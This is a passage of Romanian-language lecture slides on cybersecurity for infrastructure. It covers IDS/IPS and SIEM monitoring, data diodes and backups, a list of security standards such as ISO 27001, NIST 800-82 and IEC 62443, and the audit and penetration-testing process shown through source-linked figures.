§ Intrusion Prevention System/Intrusion Detection System
§ Sunt sisteme software, complexe, ce monitorizează întreg traficul de rețea pentru a:
§ Identifica modele tipice
§ Evenimente ieșite din comun (=atacuri, defecțiuni etc.)
§ Evenimentele de securitate sunt raportate printr-un SIEM (Security Information and Event Monitoring)
§ Suplimentar, față de un firewall, permite corelarea datelor colectate și deci o vizibilitate mai bună asupra
întregii infrastructuri
§ Trebuie plasat în puncte strategice ale rețelei
§ Se bazează pe monitorizare directă și agenți instalați pe clienți
§ SIEM-ul este eficient DOAR dacă:
§ Sunt specificate reguli de corelare
§ Regulile sunt actualizate periodic
§ Există personal uman care se uită peste notificări și corelează evenimentele, luând măsuri potrivite pentru
incidentele descoperite
PROTECȚIA INFRASTRUCTURII
DIODE DE DATE ȘI COPII DE SIGURANȚĂ
§ În cazul unui atac de securitate sau a unui dezastru natural:
§ Copiile de siguranță se fac de regulă în altă locație fizică folosind „diode de date” (conexiuni
unidirecționale ce permit doar scrierea sau doar citirea datelor)
DE UNDE ÎNCEPEM?
§ Există:
§ Vulnerabilități
§ Riscuri
§ Atacuri
§ Resurse umane
§ Cum...
§ Ne protejăm?
§ De unde începem „treaba”?
§ Pe ce ne concentrăm?
§ Care sunt pașii de urmat?
CARE ESTE MERSUL LUCRURILOR?
Sursa: https://ats.ae/cyber-security-standard/understanding-ot-cyber-security-standards/
CE PROTEJĂM ȘI CÂND?
Sursa: https://www.sciencedirect.com/topics/computer-science/cybersecurity-framework
STANDARDELE NE SALVEAZĂ!
§ Un standard este:
§ Un nivel de calitate spre care țintim.
§ O normă tehnică ce asigură calitatea finală a produsului dacă se respectă unul și același proces de producție
folosind aceleași instrumente.
§ NERC CIP: These standards are strived at protecting the national power grid.
§ NIS Directive: This legislation aims to strengthen cybersecurity across the EU.
§ MITRE ATT&CK ICS Framework: This is a globally available knowledge base of tactics and strategies used
by cyber threat actors.
§ NISTIR 8374 (Draft): This guide strives to aid organizations in managing their ransomware attacks threats.
§ ISA/IEC 62443: This framework relieves present and future security vulnerabilities in industrial
automation and control systems.
§ NIST 800-53: These security and privacy controls aim to help the federal government and critical
infrastructure.
§ NIST 800-82: This guide delivers a plan for protecting industrial control systems.
§ ISO 27000 Series: These standards concentrate on aiding companies to strengthen their information
security practices.
§ CIS Critical Security Controls: These are a set of activities that help companies protect their data against
cyber attack vectors.
ALEGEM TOTDEAUNA CALEA DE MIJLOC
Sursa: https://www.researchgate.net/figure/Cybersecurity-standards-coverage-
adapted-from-40_fig4_352152549
Sursa: https://www.cshub.com/security-strategy/articles/utilizing-cyber-security-standards-and-frameworks
ISO 27001
§ Este un standard internațional menit a ajuta organizațiile să protejeze informațiile (securitatea
informației)
§ ISO/IEC 27001:2013 and ISO/IEC 27002:2013 Information technology – Security techniques – ISO
27001 and ISO 27002 standards bundle
§ ISO/IEC 27017:2015 (ISO 27017) Information technology – Security techniques – Code of practice
for information security controls based on ISO/IEC 27002 for cloud services
§ ISO/IEC 27031:2011 (ISO 27031) Information technology – Security techniques – Guidelines for
information and communication technology readiness for business continuity
§ ISO/IEC 27000:2018 (ISO 27000) Information technology – Security techniques – Information
security management systems – Overview and vocabulary
ISO 27001
Sursa: https://www.kolide.com/blog/the-business-guide-to-iso-27001-compliance-and-certification
PROCESUL DE AUDIT
Sursa: https://www.kolide.com/blog/the-business-guide-to-iso-27001-compliance-and-certification
SECURITATEA DATELOR ESTE UN PROCES...
Sursa: https://verveindustrial.com/resources/blog/the-future-of-ot-security-ot-systems-management/
... IAR TESTAREA ESTE CRUCIALĂ!
Sursa: https://www.researchgate.net/figure/Fig-Phases-of-Penetration-Testing-12_fig1_349077887